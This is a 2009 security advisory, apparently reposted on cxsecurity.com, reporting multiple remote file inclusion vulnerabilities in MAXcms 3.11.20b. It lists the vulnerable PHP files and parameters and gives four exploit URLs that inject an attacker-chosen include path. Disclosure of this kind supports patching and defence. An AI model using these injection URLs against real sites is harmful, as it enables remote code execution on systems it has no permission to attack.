MAXcms 3.11.20b Multiple Remote File Inclusion Vulnerabilities

2009.09.28
Credit: NoGe
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-94


CVSS Base Score: 6.8/10
Impact Subscore: 6.4/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

=============================================================================================== [o] MAXcms - Databay Content Management System 3.11.20b Remote File Inclusion Vulnerability Software : MAXcms - Databay Content Management System version 3.11.20b Vendor : http://www.databay.de Download : http://downloads.sourceforge.net/micro-cms/microcms.zip Author : NoGe Contact : noge[dot]code[at]gmail[dot]com Blog : http://evilc0de.blogspot.com =============================================================================================== [o] Vulnerable file is_projectPath parameter includes/InstantSite/inc.is_root.php GLOBALS[thCMS_root] parameter classes/class.Tree.php includes/inc.thcms_admin_mediamanager.php modul/mod.rssreader.php is_path parameter classes/class.tasklist.php classes/class.thcms.php classes/class.thcms_content.php classes/class.thcms_modul_parent.php classes/class.thcms_page.php classes/class.thcsm_user.php includes/InstantSite/class.Tree.php thCMS_root parameter classes/class.thcms_modul.php includes/inc.page_edit_tasklist.php includes/inc.thcms_admin_overview_backup.php includes/inc.thcms_edit_content.php modul/class.thcms_modul_parent_xml.php modul/mod.cmstranslator.php modul/mod.download.php modul/mod.faq.php modul/mod.guestbook.php modul/mod.html.php modul/mod.menu.php modul/mod.news.php modul/mod.newsticker.php modul/mod.rss.php modul/mod.search.php modul/mod.sendtofriend.php modul/mod.sitemap.php modul/mod.tagdoc.php modul/mod.template.php modul/mod.test.php modul/mod.text.php modul/mod.upload.php modul/mod.users.php [o] Exploit http://localhost/[path]/includes/InstantSite/inc.is_root.php?is_projectPath=[evilc0de] http://localhost/[path]/classes/class.Tree.php?GLOBALS[thCMS_root]=[evilc0de] http://localhost/[path]/classes/class.thcsm_user.php?is_path=[evilc0de] http://localhost/[path]/modul/mod.users.php?thCMS_root=[evilc0de] =============================================================================================== [o] Greetz MainHack BrotherHood [ http://mainhack.net ] Vrs-hCk OoN_BoY Paman bL4Ck_3n91n3 Angela Zhang H312Y yooogy mousekill }^-^{ loqsa zxvf martfella skulmatic OLiBekaS ulga Cungkee k1tk4t str0ke ===============================================================================================

References:

http://www.vupen.com/english/advisories/2009/2136
http://www.milw0rm.com/exploits/9322
http://secunia.com/advisories/36105


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top